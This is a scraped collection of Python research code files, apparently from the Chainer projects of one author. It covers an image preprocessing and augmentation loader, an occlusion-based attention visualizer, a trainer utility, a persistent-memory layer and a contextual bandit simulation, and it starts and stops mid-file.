# resizing image
if self.args.do_resize:
if self.counter>1:
# augmentas is ordered w,h in resize method of openCV
scale = self.image_size_in_batch[1]/w, self.image_size_in_batch[0]/h
image = self.resize_image(image, scale)
else:
image = self.resize_image(image)
elif self.args.crop_params.flag:
image = self.crop_image(image)
        # augment image
if self.args.aug_params.do_augment:
image = self.augment_image(image)
if self.args.debug_mode:
u_image = image.astype(np.uint8)
show_image(u_image)
cv2.imwrite("/Users/naoki_shimada/Downloads/{}".format(os.path.basename(path)), u_image)
print(image.shape)
print('label:', label)
# assert False, 'terminate'
# store image size
        # because dimensions must be equal within a batch
self.__set_image_size_in_batch(image)
# image normalize
image = getattr(self.image_normalizer, \
self.args.im_norm_type.method)(image, self.args.im_norm_type.opts)
if self.args.debug_mode:
u_image = image.astype(np.uint8)
show_image(u_image)
# cv2.imwrite("/Users/naoki_shimada/Downloads/GCN.jpg", show_image)
print(image.shape)
print('label:', label)
# assert False, 'terminate'
if self.args.detect_edge:
edges = self.detect_edge(image)
if self.args.debug_mode:
u_image = edges.reshape(edges.shape[0], edges.shape[1]).astype(np.uint8)
show_image(u_image)
image = cv2.merge((image, edges))
# transpose for chainer
image = image.transpose(2, 0, 1)
# initialize batch counter
self.__init_batch_counter()
batch_inputs = image.astype(np.float32), np.array(label, dtype=np.int32)
if self.args.with_feature_val:
cell_diameter = \
compute_cell_diameter(src_image, debug=self.args.debug_mode)
min_nucleus_diameter, max_nucleus_diameter = \
compute_nucleus_diameter(src_image, debug=self.args.debug_mode)
features = np.array( \
[cell_diameter, min_nucleus_diameter, max_nucleus_diameter],
dtype=np.float32)
batch_inputs += (features, )
if self.args.generate_comment:
batch_inputs += (self.inputs_tokens[index], )
return batch_inputs
def color_trancefer(self, image):
h, w, _ = image.shape
if self.args.converse_gray:
image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY).reshape((h,w,1))
else:
image = image.astype(np.float32)
return image
def augment_image(self, image):
if self.args.aug_params.params.do_scale and self.counter==1:
image = self.scaling(image)
if self.args.aug_params.params.do_flip:
image = self.flip(image)
if self.args.aug_params.params.change_britghtness:
image = self.random_brightness(image)
if self.args.aug_params.params.change_contrast:
image = self.random_contrast(image)
if self.args.aug_params.params.do_rotate:
image = self.rotate_image(image)
if self.args.aug_params.params.do_shift:
image = self.shift_image(image)
if self.args.aug_params.params.do_blur:
image = self.random_blur(image)
return image
def resize_image(self, image, scale=None):
xh, xw = image.shape[:2]
if scale is None:
            # if scale is not defined, snap the size to the nearest multiple
h_scale = (xh//self.args.multiple)*self.args.multiple/xh
w_scale = (xw//self.args.multiple)*self.args.multiple/xw
scale = w_scale, h_scale
elif isinstance(scale, numbers.Number):
scale = scale, scale
elif isinstance(scale, tuple) and len(scale)>2:
raise RuntimeError("Error occurred with variable ot scale in resize_image method")
        new_sz = (int(xw*scale[0])+1, int(xh*scale[1])+1)  # OpenCV's resize expects (w, h)
image = cv2.resize(image, new_sz)
xh, xw = image.shape[:2]
m0, m1 = xh % self.args.multiple, xw % self.args.multiple
d0, d1 = np.random.randint(m0+1), np.random.randint(m1+1)
image = image[d0:(image.shape[0] - m0 + d0), d1:(image.shape[1] - m1 + d1)]
if len(image.shape)==2:
return image.reshape((image.shape[0], image.shape[1], 1))
else:
return image
def flip(self, image):
do_flip_xy = np.random.randint(0, 2)
do_flip_x = np.random.randint(0, 2)
do_flip_y = np.random.randint(0, 2)
if do_flip_xy: # Transpose X and Y axis
image = image[::-1, ::-1, :]
elif do_flip_x: # Flip along Y-axis
image = image[::-1, :, :]
elif do_flip_y: # Flip along X-axis
image = image[:, ::-1, :]
return image
def scaling(self, image):
do_scale = np.random.randint(0, 2)
if do_scale:
scale = self.args.aug_params.params.scale[ \
np.random.randint(0,len(self.args.aug_params.params.scale))]
return self.resize_image(image, scale)
else:
return image
def random_brightness(self, image, lower=0.2, upper=2.0, seed=None):
brightness_flag = np.random.randint(0, 2)
if brightness_flag:
h, w, ch = image.shape
gamma = np.random.uniform(lower, upper)
image = 255 * np.power(image, 1.0/gamma)*255**(-1.0/gamma)
return self.__reshpe_channel(image, (h,w,ch))
else:
return image
def random_contrast(self, image, lower=1.0, upper=20.0, seed=None):
def __change(one_channel):
f = np.random.uniform(lower, upper)
return 255.0/(1+np.exp(-f*(one_channel-128)/255))
# mean = one_channel.mean()
# max_val = one_channel.max()
# return max_val/(1+np.exp(-f*(one_channel-mean)/max_val))
# return (one_channel - mean) * f + mean
contrast_flag = np.random.randint(0, 2)
if contrast_flag:
h, w, ch = image.shape
image = cv2.merge(tuple(__change(d_ch) for d_ch in cv2.split(image)))
return self.__reshpe_channel(image, (h,w,ch))
else:
return image
def shift_image(self, image):
do_shift_xy = np.random.randint(0, 2)
do_shift_x = np.random.randint(0, 2)
do_shift_y = np.random.randint(0, 2)
if do_shift_xy:
lr_shift = self.args.aug_params.params.lr_shift[ \
np.random.randint(0,len(self.args.aug_params.params.lr_shift))]
ud_shift = self.args.aug_params.params.ud_shift[ \
np.random.randint(0,len(self.args.aug_params.params.ud_shift))]
elif do_shift_y:
lr_shift = 0
ud_shift = self.args.aug_params.params.ud_shift[ \
np.random.randint(0,len(self.args.aug_params.params.ud_shift))]
elif do_shift_x:
lr_shift = self.args.aug_params.params.lr_shift[ \
np.random.randint(0,len(self.args.aug_params.params.lr_shift))]
ud_shift = 0
        if do_shift_xy or do_shift_x or do_shift_y:
h, w, ch = image.shape
            affine_matrix = np.float32([[1,0,lr_shift],[0,1,ud_shift]])  # horizontal, vertical
image = cv2.warpAffine(image, affine_matrix, (w,h))
return self.__reshpe_channel(image, (h,w,ch))
else:
return image
def rotate_image(self, image):
do_rotate = np.random.randint(0, 2)
if do_rotate:
h, w, ch = image.shape
rotation_angle = self.args.aug_params.params.rotation_angle[ \
np.random.randint(0,len(self.args.aug_params.params.rotation_angle))]
affine_matrix = cv2.getRotationMatrix2D((h/2, w/2), rotation_angle, 1)
image = cv2.warpAffine(image, affine_matrix, (w,h))
return self.__reshpe_channel(image, (h,w,ch))
else:
return image
def random_blur(self, image, average_square=None):
do_blur = np.random.randint(0, 2)
if do_blur:
h, w, ch = image.shape
# the larger the number, the blurred.
# original: (25, 25)
average_square = (10, 10) if average_square is None else average_square
# calculate moving average and output
image = cv2.blur(image, average_square)
return self.__reshpe_channel(image, (h,w,ch))
else:
return image
def crop_image(self, image):
h, w, ch = image.shape
top = int((w-self.args.crop_params.size)/2)
left = int((h-self.args.crop_params.size)/2)
return image[left:left+self.args.crop_params.size,top:top+self.args.crop_params.size,:]
def __reshpe_channel(self, image, im_shape ):
if len(image.shape)==2:
return image.reshape(im_shape)
else:
return image
def compute_token_ids(self):
parser = Tokenizer(self.args.token_args)
return parser.token2id()
def detect_edge(self, image):
h, w, ch = image.shape
# to gray
if ch==3:
gray_img = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY).reshape((h,w,1))
else:
gray_img = image
# edge images respectively
return cv2.Canny(gray_img, 32, 64) # (50, 110), (128, 128)
``` |
{
"source": "0shimax/chainer-learning-to-remember-rare-events",
"score": 2
} |
#### File: evaluator/visualizer/attention_visualizer.py
```python
import sys, os
sys.path.append('./src/common')
sys.path.append('./src/common/image_processor')
sys.path.append('./src/net')
sys.path.append('./experiment_settings')
from mini_batch_loader import DatasetPreProcessor
from visualization_settings import get_args
from trainer_utils import EasyTrainer
import chainer
from chainer import Variable, cuda
import numpy as np
import cv2
from itertools import product
from math import ceil, floor
class AttentionVisualizer(object):
"""
see OBJECT DETECTORS EMERGE IN DEEP SCENE CNNs, Zhou+, '15
https://arxiv.org/abs/1412.6856
"""
def __init__(self, args):
self.args = args
self.xp = cuda.cupy if args.gpu>=0 else np
if args.size < 32:
            raise ValueError(
                'args.size must be at least 32 for pyramid spatial pooling.')
def calculate_slice_idxs(self, size, x, y, h, w):
patch_harf_slide = ceil(size/2)
sl_strt_x = int(max(0, x - patch_harf_slide))
sl_end_x = int(min(h, x - patch_harf_slide + size))
sl_strt_y = int(max(0, y - patch_harf_slide))
sl_end_y = int(min(w, y - patch_harf_slide + size))
return sl_strt_x, sl_end_x, sl_strt_y, sl_end_y
def calculate_target_class(self, y, gt):
if self.args.view_type=='gt':
prob = y[0, gt]
target_class = gt
elif self.args.view_type=='infer':
max_class_idx = int(self.xp.argmax(y[0, :]))
prob = y[0, max_class_idx]
target_class = max_class_idx
return prob, target_class,
def crop_patches(self, image):
'''
        generating occluded images is time consuming,
        so we crop image patches instead of occluding regions.
        note that the attention score is therefore reversed
        relative to the occlusion formulation.
'''
n_img, ch, h, w = image.shape
num_occluded_img = \
((h - 1)//self.args.stride+1) * ((w - 1)//self.args.stride+1)
patches = self.xp.zeros( \
(num_occluded_img, ch, self.args.size, self.args.size), \
dtype=np.float32)
window_pos = []
idx = 0
for x, y in product(range(self.args.size//2, h, self.args.stride), \
range(self.args.size//2, w, self.args.stride)):
sl_strt_x, sl_end_x, sl_strt_y, sl_end_y = \
self.calculate_slice_idxs(self.args.size, x, y, h, w)
patch = image[:, :, sl_strt_x:sl_end_x, sl_strt_y:sl_end_y]
if min(patch.shape[2:])<self.args.size:
continue
patches[idx] = patch
window_pos.append([x, y])
idx += 1
window_pos = self.xp.array(window_pos, dtype=np.int32)
return patches[:idx], window_pos
def compute_one_batch_mask( \
self, mask, patches, prob, target_class, w_pos, idx):
n_img, ch, h, w = mask.shape
x_batch = Variable(patches[idx:idx+self.args.patch_batchsize])
self.args.net(x_batch, self.xp.array( \
[target_class]*len(x_batch.data), np.int32))
y_batch = self.args.net.prob.data
patches_prob = y_batch[:, target_class]
# attention score
diff = patches_prob - prob
if self.args.gpu>=0:
threshold = np.percentile(self.xp.asnumpy(diff), self.args.percentile)
else:
threshold = self.xp.percentile(diff, self.args.percentile)
batch_w_pos = w_pos[idx:idx+self.args.patch_batchsize]
crux_coordinate = self.xp.array([batch_w_pos[idx] for idx, flag in \
enumerate(diff > threshold) if flag], dtype=np.float32)
for x, y in crux_coordinate:
sl_strt_x, sl_end_x, sl_strt_y, sl_end_y = \
self.calculate_slice_idxs(self.args.size, x, y, h, w)
mask[:, :, sl_strt_x:sl_end_x, sl_strt_y:sl_end_y] = 1.
return mask
def compute_attention_mask(self, image, gt):
'''
        create a binary mask over the regions the network attends to.
image : (3, height, width)
gt : integer
percentile: degree of interest
'''
ch, h, w = image.shape
image = image.reshape(1, ch, h, w).astype(np.float32)
if self.args.gpu >= 0:
image = cuda.to_gpu(image, device=self.args.gpu)
x = Variable(image)
self.args.net(x, self.xp.array([gt], np.int32))
y = self.args.net.prob.data
prob, target_class = self.calculate_target_class(y, gt)
patches, w_pos = self.crop_patches(image)
if self.args.gpu>=0:
patches = cuda.to_gpu(patches, device=self.args.gpu)
mask = self.xp.zeros_like(image)
for idx in range(0, len(patches), self.args.patch_batchsize):
mask = self.compute_one_batch_mask( \
mask, patches, prob, target_class, w_pos, idx)
return mask, target_class
def visualize_attention(self, raw_image, preprocessed_image, gt):
'''
gt : integer
percentile: degree of interest
'''
h, w, _ = raw_image.shape
mask, target_class = \
self.compute_attention_mask(preprocessed_image, gt)
mask = mask[0].transpose(1,2,0).astype(np.uint8)
xp = cuda.get_array_module(mask)
if xp!=np:
mask = self.xp.asnumpy(mask)
mask = cv2.resize(mask, (w, h))
return raw_image * mask, target_class
if __name__=='__main__':
args = get_args()
mini_batch_loader = DatasetPreProcessor(args)
visualizer = AttentionVisualizer(args)
_, model_eval = EasyTrainer.prepare_model(args)
args.net = model_eval
for idx, (image_path, label) in enumerate(mini_batch_loader.pairs):
raw_image = cv2.imread(image_path)
preprocessed_image, _ = mini_batch_loader.get_example(idx)
attention_view, target_class = \
visualizer.visualize_attention(raw_image, preprocessed_image, label)
        name, extension = os.path.basename(image_path).rsplit('.', 1)
image_fname = name+'_'+str(label)+'_'+str(target_class)+'.'+extension
output_path = os.path.join(args.output_path, 'visualized_attention_images')
if not os.path.exists(output_path):
print("create directory:", output_path)
os.mkdir(output_path)
output_path = os.path.join(output_path, image_fname)
cv2.imwrite(output_path, attention_view)
```
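The scoring rule inside `compute_one_batch_mask`, reduced to a hedged numpy sketch (names and numbers are illustrative): patches whose target-class probability exceeds the full-image probability by more than a chosen percentile are marked as attention regions.
```python
import numpy as np

def attention_patch_indices(patch_probs, base_prob, percentile=75):
    """Indices of patches that raise the target-class probability."""
    diff = patch_probs - base_prob               # per-patch score
    threshold = np.percentile(diff, percentile)  # keep only the top patches
    return np.where(diff > threshold)[0]

# Toy example: only patch 2 clearly supports the target class.
probs = np.array([0.10, 0.12, 0.90, 0.11])
print(attention_patch_indices(probs, base_prob=0.15))  # [2]
```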
#### File: src/common/trainer_utils.py
```python
import sys, os
sys.path.append('./src/common')
sys.path.append('./src/common/image_processor')
sys.path.append('./src/net')
sys.path.append('./src/net/RAM')
sys.path.append('./src/net/caption_generator')
sys.path.append('./src/net/feedback')
sys.path.append('./experiment_settings')
from mini_batch_loader import DatasetPreProcessor
from important_serial_iterator import ImportantSerialIterator
from copy_model import copy_model
import numpy as np
import chainer
import chainer.functions as F
from chainer import serializers
from chainer import cuda, Variable
from chainer import Reporter, report, report_scope
from chainer import optimizers, serializers, training
from chainer.training import extensions
import importlib
class EasyTrainer(object):
def __init__(self, args, settings_type):
self.args = args
self.settings_type = settings_type
@staticmethod
def prepare_model(args):
model = getattr(
importlib.import_module(args.archtecture.module_name), \
args.archtecture.class_name) \
(args.n_class, args.in_ch)
if os.path.exists(args.initial_model):
print('Load model from', args.initial_model, file=sys.stderr)
serializers.load_npz(args.initial_model, model)
if args.gpu >= 0:
chainer.cuda.get_device(args.gpu).use()
model.to_gpu()
model.train = True
model.n_class = args.n_class
m_eval = model.copy()
m_eval.train = False
model.active_learn = args.active_learn
return model, m_eval
def select_optimizer(self):
if self.args.training_params.optimizer=='RMSpropGraves':
return chainer.optimizers.RMSpropGraves(self.args.training_params.lr)
elif self.args.training_params.optimizer=='Adam':
return chainer.optimizers.Adam()
elif self.args.training_params.optimizer=='AdaDelta':
return chainer.optimizers.AdaDelta()
elif self.args.training_params.optimizer=='NesterovAG':
return chainer.optimizers.NesterovAG(self.args.training_params.lr)
elif self.args.training_params.optimizer=='MomentumSGD':
return chainer.optimizers.MomentumSGD(self.args.training_params.lr)
def prepare_optimizer(self, model):
optimizer = self.select_optimizer()
optimizer.setup(model)
# print("optimizer.target.params()")
# print(optimizer.target.__dict__)
# optimizer.target.__dict__ = {k: v for k, v in optimizer.target.__dict__.items() if "memory_" not in k}
# print(optimizer.target.__dict__)
# optimizer.target._params = (param for param in optimizer.target.params() if "memory_" not in param.name)
# print([param for param in optimizer.target.params()])
if self.args.training_params.weight_decay:
optimizer.add_hook(chainer.optimizer.WeightDecay( \
self.args.training_params.weight_decay))
if self.args.training_params.lasso:
optimizer.add_hook(chainer.optimizer.Lasso( \
self.args.training_params.weight_decay))
if self.args.training_params.clip_grad:
optimizer.add_hook(chainer.optimizer.GradientClipping( \
self.args.training_params.clip_value))
return optimizer
def prepare_dataset(self):
mode_settings = importlib.import_module(self.settings_type)
train_args = mode_settings.get_args('train')
# load dataset
if chainer.config.user_data_set=='mnist':
train_mini_batch_loader, test_mini_batch_loader = \
chainer.datasets.get_mnist()
else:
train_mini_batch_loader = DatasetPreProcessor(train_args)
            test_mini_batch_loader = DatasetPreProcessor(mode_settings.get_args('test'))
if train_args.importance_sampling:
print("importance----------")
train_it = ImportantSerialIterator( \
train_mini_batch_loader, \
train_args.training_params.batch_size, \
shuffle=train_args.shuffle, \
p=np.loadtxt(train_args.weights_file_path))
else:
if train_args.training_params.iter_type=='multi':
iterator = chainer.iterators.MultiprocessIterator
else:
iterator = chainer.iterators.SerialIterator
train_it = iterator( \
train_mini_batch_loader, \
train_args.training_params.batch_size, \
shuffle=train_args.shuffle)
val_batch_size = 1
val_it = iterator( \
test_mini_batch_loader, \
val_batch_size, repeat=False, shuffle=False)
return train_it, val_it, train_mini_batch_loader.__len__()
def prepare_updater(self, train_it, optimizer):
if self.args.training_params.updater_type=='standerd':
return training.StandardUpdater( \
train_it, optimizer, device=self.args.gpu)
elif self.args.training_params.updater_type=='parallel':
return training.ParallelUpdater( \
train_it, optimizer, devices={'main': 1, 'second': 0})
def run_trainer(self):
# load model
model, model_for_eval = self.prepare_model(self.args)
print("---set model----------")
# Setup optimizer
optimizer = self.prepare_optimizer(model)
print("---set optimzer----------")
# load data
train_it, val_it, train_data_length = self.prepare_dataset()
print("---set data----------")
updater = self.prepare_updater(train_it, optimizer)
print("---set updater----------")
evaluator_interval = self.args.training_params.report_epoch, 'epoch'
snapshot_interval = self.args.training_params.snapshot_epoch, 'epoch'
log_interval = self.args.training_params.report_epoch, 'epoch'
trainer = training.Trainer( updater, \
(self.args.training_params.epoch, 'epoch'), out=self.args.output_path)
trainer.extend( \
extensions.Evaluator(val_it, model_for_eval, device=self.args.gpu), \
trigger=evaluator_interval)
trainer.extend(extensions.dump_graph('main/loss'))
trainer.extend(extensions.snapshot(), trigger=snapshot_interval)
trainer.extend(extensions.snapshot_object( \
model, 'model_iter_{.updater.iteration}'), trigger=snapshot_interval)
if self.args.training_params.optimizer!='Adam' \
and self.args.training_params.optimizer!='AdaDelta':
trainer.extend(extensions.ExponentialShift( \
'lr', self.args.training_params.decay_factor), \
trigger=(self.args.training_params.decay_epoch, 'epoch'))
trainer.extend(extensions.observe_lr(), trigger=log_interval)
trainer.extend(extensions.LogReport(trigger=log_interval))
trainer.extend(extensions.PrintReport([ \
'epoch', 'iteration', 'main/loss', 'validation/main/loss', \
'main/accuracy', 'validation/main/accuracy', \
]), trigger=log_interval)
trainer.extend(extensions.ProgressBar(update_interval=1))
print("---set trainer----------")
if os.path.exists(self.args.resume):
print('resume trainer:{}'.format(self.args.resume))
# Resume from a snapshot
serializers.load_npz(self.args.resume, trainer)
trainer.run()
``` |
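A hedged usage sketch (the settings module name is hypothetical; per `prepare_dataset`, it must expose a `get_args(mode)` function):
```python
import importlib

from trainer_utils import EasyTrainer

settings_module = "train_settings"  # hypothetical experiment-settings module
args = importlib.import_module(settings_module).get_args("train")
EasyTrainer(args, settings_module).run_trainer()
```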
{
"source": "0shimax/chainer-PRNN",
"score": 3
} |
#### File: 0shimax/chainer-PRNN/persistent_memory_function.py
```python
import numpy
import chainer
from chainer import function_node
class PersistentMemoryFunction(function_node.FunctionNode):
def forward(self, inputs):
self.retain_inputs((0, 1))
x, memory = inputs
batch = len(x)
if (isinstance(x, numpy.ndarray) and
not (x.flags.c_contiguous or x.flags.f_contiguous) and
1 in x.shape):
x = numpy.ascontiguousarray(x)
        # Follow chainer's LinearFunction convention (y = x W^T) so the
        # backward passes below, which mirror LinearFunction's, stay consistent.
        y = x.dot(memory.T).astype(x.dtype, copy=False)
        # self.retain_outputs((0,))
        # FunctionNode.forward must return a tuple of arrays.
        return y,
def backward(self, indexes, grad_outputs):
x, memory = self.get_retained_inputs()
gy, = grad_outputs
ret = []
gx, = MemoryGradData().apply((memory, gy))
ret.append(chainer.functions.cast(gx, x.dtype))
gm, = MemoryGradWeight().apply((x, gy))
ret.append(chainer.functions.cast(gm, memory.dtype))
return ret
class MemoryGradData(function_node.FunctionNode):
def forward(self, inputs):
self.retain_inputs((0, 1))
memory, gy = inputs
if (isinstance(gy, numpy.ndarray) and
not (gy.flags.c_contiguous or gy.flags.f_contiguous) and
1 in gy.shape):
gy = numpy.ascontiguousarray(gy)
gx = gy.dot(memory).astype(gy.dtype, copy=False)
return gx,
def backward(self, indexes, grad_outputs):
memory, gy = self.get_retained_inputs()
ggx, = grad_outputs
ret = []
gm, = MemoryGradWeight().apply((ggx, gy))
ret.append(chainer.functions.cast(gm, memory.dtype))
ggy = persistent_memory(ggx, memory)
ret.append(chainer.functions.cast(ggy, gy.dtype))
return ret
class MemoryGradWeight(function_node.FunctionNode):
def forward(self, inputs):
self.retain_inputs((0, 1))
x, gy = inputs
if (isinstance(gy, numpy.ndarray) and
not (gy.flags.c_contiguous or gy.flags.f_contiguous) and
1 in gy.shape):
gy = numpy.ascontiguousarray(gy)
gW = gy.T.dot(x).astype(gy.dtype, copy=False)
return gW,
def backward(self, indexes, grad_outputs):
x, gy = self.get_retained_inputs()
ggW, = grad_outputs
ret = []
gx, = MemoryGradData().apply((ggW, gy))
ret.append(chainer.functions.cast(gx, x.dtype))
ggy = persistent_memory(x, ggW)
ret.append(chainer.functions.cast(ggy, gy.dtype))
return ret
def persistent_memory(x, memory):
x = x.reshape(len(x), -1)
args = x, memory
y, = PersistentMemoryFunction().apply(args)
return y
```
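A quick numerical check of the backward pass, as a hedged sketch with `chainer.gradient_check` (shapes are illustrative; assumes the linear-style convention `y = x @ memory.T` used above):
```python
import numpy as np
from chainer import gradient_check

batch, in_size, out_size = 4, 6, 5
x = np.random.randn(batch, in_size).astype(np.float32)
memory = np.random.randn(out_size, in_size).astype(np.float32)
gy = np.random.randn(batch, out_size).astype(np.float32)

# Compares the analytic gradients of persistent_memory against
# numerically differentiated ones.
gradient_check.check_backward(
    persistent_memory, (x, memory), gy, atol=1e-3, rtol=1e-3)
```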
#### File: 0shimax/chainer-PRNN/persistent_memory_link.py
```python
import functools
import operator
from chainer import initializers
from chainer import link
from chainer import variable
import chainer.functions as F
from persistent_memory_function import persistent_memory
class PersistentMemory(link.Chain):
def __init__(self, in_size, slot_size, memory_size, initialW=None):
"""
in_size: hidden_state h_size
"""
super().__init__()
self.slot_size = slot_size
self.memory_size = memory_size
with self.init_scope():
W_initializer = initializers._get_initializer(initialW)
self.memory = variable.Parameter(W_initializer)
self.projection_matrix = variable.Parameter(W_initializer)
def _initialize_params(self, in_size):
self.memory.initialize((self.memory_size, self.slot_size))
self.projection_matrix.initialize((in_size, self.memory_size))
def calculate_memory_weight(self, in_size, hidden_state):
# print("hidden_state", hidden_state)
DM = F.matmul(self.projection_matrix, self.memory) # (in_size, slot_size)
# print("DM----", DM)
sim = F.matmul(hidden_state, DM) # (batch_size, slot_size)
# print("sim----", sim)
n_batch, n_slot = sim.shape
normed_hidden = F.reshape(F.batch_l2_norm_squared(hidden_state), (-1, 1))
sim = F.exp(F.log(1+sim) - F.log(1+F.tile(normed_hidden, (1, n_slot))))
# sim /= F.tile(normed_hidden, (1, n_slot)) # (batch_size, slot_size)/(batch_size,)
sim = F.exp(F.log(1+sim) - F.log(1+F.tile(F.sum(DM*DM, axis=0), (n_batch, 1))))
# sim /= F.tile(
# F.sum(DM*DM, axis=0), (n_batch, 1)) # (batch_size, slot_size)/(slot_size,)
return F.softmax(sim) # (batch_size, slot_size)
def __call__(self, x):
in_size = None
if self.memory.data is None:
in_size = functools.reduce(operator.mul, x.shape[1:], 1)
self._initialize_params(in_size)
self.weight = self.calculate_memory_weight(in_size, x)
n_batch, n_slot = self.weight.shape
n_memory, _ = self.memory.shape
# (batch_size, slot_size)*(memory_size, slot_size)
wm = F.reshape(
F.tile(self.weight, (1, n_memory)), (-1, n_memory, n_slot)) \
* F.tile(self.memory, (n_batch, 1, 1))
return F.sum(wm, axis=2)
``` |
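A hedged usage sketch of the link (sizes are illustrative; the output is one memory readout per example):
```python
import numpy as np
import chainer

from persistent_memory_link import PersistentMemory

pm = PersistentMemory(in_size=8, slot_size=16, memory_size=8)
h = chainer.Variable(np.random.randn(4, 8).astype(np.float32))  # hidden states
m = pm(h)
print(m.shape)  # (4, 8): (batch, memory_size)
```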
{
"source": "0shimax/contextual-bandit",
"score": 3
} |
#### File: 0shimax/contextual-bandit/contextual_multi_arms_bandits.py
```python
import numpy as np
from numpy.random import uniform, randint
np.random.seed(555)
class Arm:
def __init__(self, feature_dim, content_id, alpha=0.01):
self.content_id = content_id
        self.alpha = alpha  # exploration parameter: scales the UCB confidence bonus
self.norm_mean = np.zeros((1, feature_dim))
# Covariance matrix:
# Store diagonal components only to increase memory efficiency
self.cov_matrix = np.ones((1, feature_dim))
self.win_rate = 0
self.win = 0
self.lose = 0
def update(self, features, is_click):
features = features.reshape((1,features.shape[0]))
self.cov_matrix += np.diag(features.T.dot(features))
self.norm_mean += is_click*features
if is_click:
self.win+=1
else:
self.lose+=1
self.win_rate = self.win/(self.win + self.lose)
def predict(self, features):
features = features.reshape((features.shape[0],1))
        # Since only the diagonal of the covariance matrix is stored,
        # inverting it reduces to taking the elementwise reciprocal.
        theta = (1/self.cov_matrix)*self.norm_mean # [1, feature_dim]
        # Again, the inverse covariance is just the elementwise reciprocal.
return theta.dot(features) + \
self.alpha*np.sqrt((features.T*(1/self.cov_matrix)).dot(features))
def print_result(self):
print('content_id:{}, total_num:{}, win_rate:{}'.format(\
self.content_id, self.win+self.lose, self.win_rate))
class Viewer:
def __init__(self, gender='man'):
self.gender = gender
def view(self, content_id):
if self.gender == 'man':
# Men are easy to click on ads with id 5 or less
if content_id<6:
return True if uniform(0, 1.0) > 0.3 else False
else:
return True if uniform(0, 1.0) > 0.7 else False
else:
# Women are easy to click on ads with id 6 or higher
if content_id > 5:
return True if uniform(0, 1.0) > 0.3 else False
else:
return True if uniform(0, 1.0) > 0.7 else False
class Rulet:
def __init__(self, feature_dim):
self.arms = {}
self.feature_dim = feature_dim
def generate_arm(self, content_id):
if content_id not in self.arms:
self.arms[content_id] = Arm(self.feature_dim, content_id)
return self.arms[content_id]
def generate_features(self):
viewer = Viewer(self.generate_gender())
features = np.array([1,0]) if viewer.gender=='man' else np.array([0,1])
content_id = self.generate_content()
return features, viewer.view(content_id), self.generate_arm(content_id)
def generate_content(self):
return randint(1, 10)
def generate_gender(self):
return 'man' if uniform(0, 1.0) > 0.5 else 'women'
if __name__=='__main__':
'''Context is for men and women only
Men are easy to click on ads with id 5 or less
Women are easy to click on ads with id 6 or higher
'''
    alpha = 0.0001  # exploration parameter (unused here; Arm instances use their own default)
feature_dim = 2
num_of_views = 10000
rulet = Rulet(feature_dim)
for step in range(num_of_views):
features, is_clicked, arm = rulet.generate_features()
arm.update(features, is_clicked)
# Confirmation of prediction accuracy when the number of data is small
if step<2000:
arm.print_result()
print('print result======')
for content_id, arm in rulet.arms.items():
arm.print_result()
print('Click rate when men browse:' + str(arm.predict(np.array([1,0]))) )
print('Click rate when women browse:'+ str(arm.predict(np.array([0,1]))) )
``` |
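A small check of the diagonal-covariance shortcut used in `Arm.predict` (illustrative numbers): for a diagonal matrix, applying the inverse is the same as dividing elementwise.
```python
import numpy as np

d = np.array([2.0, 4.0, 5.0])    # diagonal entries of the covariance
A = np.diag(d)
x = np.array([1.0, 2.0, 3.0])

full = np.linalg.inv(A).dot(x)   # dense inverse
fast = (1.0 / d) * x             # elementwise reciprocal shortcut
assert np.allclose(full, fast)
print(fast)                      # [0.5 0.5 0.6]
```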
{
"source": "0shimax/DL-vision",
"score": 3
} |
#### File: common/image_processor/mini_batch_loader.py
```python
import os, sys
sys.path.append('./src/common/image_processor')
import chainer
import cv2
import numpy as np
from contextlib import ExitStack
import numbers
from image_normalizer import ImageNormalizer
class DatasetPreProcessor(chainer.dataset.DatasetMixin):
def __init__(self, args):
"""args type is EasyDict class
"""
self.args = args
self.gray = args.converse_gray
self.image_normalizer = ImageNormalizer()
self.pairs = self.load_pairs()
self.counter = 0
self.image_size_in_batch = [None, None] # height, width
def __len__(self):
return len(self.pairs)
def __init_batch_counter(self):
if self.args.train and self.counter==self.args.training_params.batch_size:
self.counter = 0
self.image_size_in_batch = [None, None]
def __set_image_size_in_batch(self, image):
if self.counter==1:
resized_h, resized_w = image.shape[:2]
self.image_size_in_batch = [resized_h, resized_w]
def get_example(self, index):
self.counter += 1
if self.args.debug_mode:
if self.counter>15:
assert False, 'stop test'
        image, label = self.pairs[index]
        if image is None:
            raise RuntimeError("invalid image at index: {}".format(index))
        # gray transform if converse_gray is True
        image = self.color_trancefer(image)
        h, w, ch = image.shape
# resizing image
if self.args.do_resize:
if self.counter>1:
                # arguments are ordered (w, h) in OpenCV's resize method
scale = self.image_size_in_batch[1]/w, self.image_size_in_batch[0]/h
image= self.resize_image(image, scale)
else:
image= self.resize_image(image)
elif self.args.crop_params.flag:
image = self.crop_image(image)
# print('resizing done-------------')
# augmentat image
if self.args.aug_params.do_augment:
image = self.augment_image(image)
# store image size
        # because dimensions must be equal within a batch
self.__set_image_size_in_batch(image)
# print('augmentation done-------------')
# image normalize
image = getattr(self.image_normalizer, \
self.args.im_norm_type.method)(image, self.args.im_norm_type.opts)
# print('normalization done-------------')
if self.args.debug_mode:
cv2.imshow('image', image)
cv2.waitKey(0)
cv2.destroyAllWindows()
print(image.shape)
print('label:', label)
# transpose for chainer
image = image.transpose(2, 0, 1)
# initialize batch counter
self.__init_batch_counter()
return image.astype(np.float32), np.array(label, dtype=np.int32)
def load_pairs(self):
image_label_pairs = []
for image, label in self.image_label_pair_generator():
image_label_pairs.append((image, label))
return image_label_pairs
def image_label_pair_generator(self):
import pickle
def __unpickle(file_name):
with open(file_name, 'rb') as f_cifar10:
pairs = pickle.load(f_cifar10, encoding='latin-1')
return pairs
pair = __unpickle(self.args.image_pointer_path)
for image, label in zip(pair["data"], pair['labels']):
yield image.reshape((3,32,32)).transpose(1,2,0), label
def color_trancefer(self, image):
h, w, _ = image.shape
if self.args.converse_gray:
image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY).reshape((h,w,1))
# elif self.yuv:
# image = cv2.cvtColor(image, cv2.COLOR_RGB2YCrCb).astype(np.float32)
else:
image = image.astype(np.float32)
return image
def augment_image(self, image):
if self.args.aug_params.params.do_scale and self.counter==1:
image = self.scaling(image)
if self.args.aug_params.params.do_flip:
image = self.flip(image)
if self.args.aug_params.params.change_britghtness:
image = self.random_brightness(image)
if self.args.aug_params.params.change_contrast:
image = self.random_contrast(image)
if self.args.aug_params.params.do_rotate:
image = self.rotate_image(image)
if self.args.aug_params.params.do_shift:
image = self.shift_image(image)
return image
def resize_image(self, image, scale=None):
